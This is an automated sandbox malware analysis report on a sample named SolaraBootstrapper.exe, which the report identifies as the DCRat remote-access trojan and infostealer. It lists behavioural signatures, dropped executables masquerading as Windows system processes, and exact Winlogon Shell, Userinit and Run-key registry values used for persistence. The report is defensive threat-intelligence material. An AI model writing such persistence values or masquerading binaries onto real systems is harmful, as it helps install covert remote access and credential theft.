Malware Analysis Report

2024-11-15 05:52

Sample ID 240721-y1xp9ssflb
Target SolaraBootstrapper.exe
SHA256 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab
Tags
dcrat execution infostealer persistence privilege_escalation rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab

Threat Level: Known bad

The file SolaraBootstrapper.exe was found to be: Known bad.

Malicious Activity Summary

dcrat execution infostealer persistence privilege_escalation rat spyware stealer

DcRat

DCRat payload

Dcrat family

Process spawned unexpected child process

Modifies WinLogon for persistence

DCRat payload

Event Triggered Execution: AppInit DLLs

Command and Scripting Interpreter: PowerShell

.NET Reactor protector

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Enumerates connected drives

Blocklisted process makes network request

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Runs ping.exe

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-21 20:15

Signatures

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Dcrat family

dcrat

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-21 20:15

Reported

2024-07-21 21:59

Platform

win7-20240708-en

Max time kernel

1800s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\14.0\Common C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\"" 
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program 
Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program 
Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\winNet\\Idle.exe\", \"C:\\Windows\\Prefetch\\ReadyBoot\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\xdwdSublime Text.exe" C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Event Triggered Execution: AppInit DLLs

persistence privilege_escalation

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\Bloxstrap.exe N/A
N/A N/A C:\winNet\wscript.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\winNet\wscript.exe.exe N/A
N/A N/A C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\winNet\wscript.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A
N/A N/A C:\winNet\wscript.exe N/A
N/A N/A C:\winNet\wscript.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\winNet\lsm.exe N/A
N/A N/A C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe N/A
N/A N/A C:\winNet\lsm.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\Public\Pictures\sddsfsdf.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe N/A
N/A N/A C:\winNet\spoolsv.exe N/A
N/A N/A C:\Windows\Offline Web Pages\Refcrt.exe N/A
N/A N/A C:\winNet\Bloxstrap.exe N/A
N/A N/A C:\Users\All Users\Microsoft\eHome\wininit.exe N/A
N/A N/A C:\Windows\Offline Web Pages\Refcrt.exe.exe N/A
N/A N/A C:\winNet\Bloxstrap.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\All Users\Microsoft\eHome\wininit.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\winNet\wscript.exe N/A
N/A N/A C:\winNet\Idle.exe N/A
N/A N/A C:\winNet\wscript.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Program Files\Windows Defender\es-ES\cmd.exe N/A
N/A N/A C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe N/A
N/A N/A C:\winNet\lsm.exe N/A
N/A N/A C:\Windows\Prefetch\ReadyBoot\explorer.exe N/A
N/A N/A C:\winNet\lsm.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\Public\Pictures\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\WmiPrvSE.exe N/A
N/A N/A C:\winNet\lsass.exe N/A
N/A N/A C:\winNet\lsass.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\dwm.exe N/A
N/A N/A C:\Users\Default User\dllhost.exe N/A
N/A N/A C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\dwm.exe.exe N/A
N/A N/A C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\system32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\winNet\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Downloaded Program Files\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\winNet\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\DriversavessessionDlldhcp\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\DriversavessessionDlldhcp\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\winNet\\lsm.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
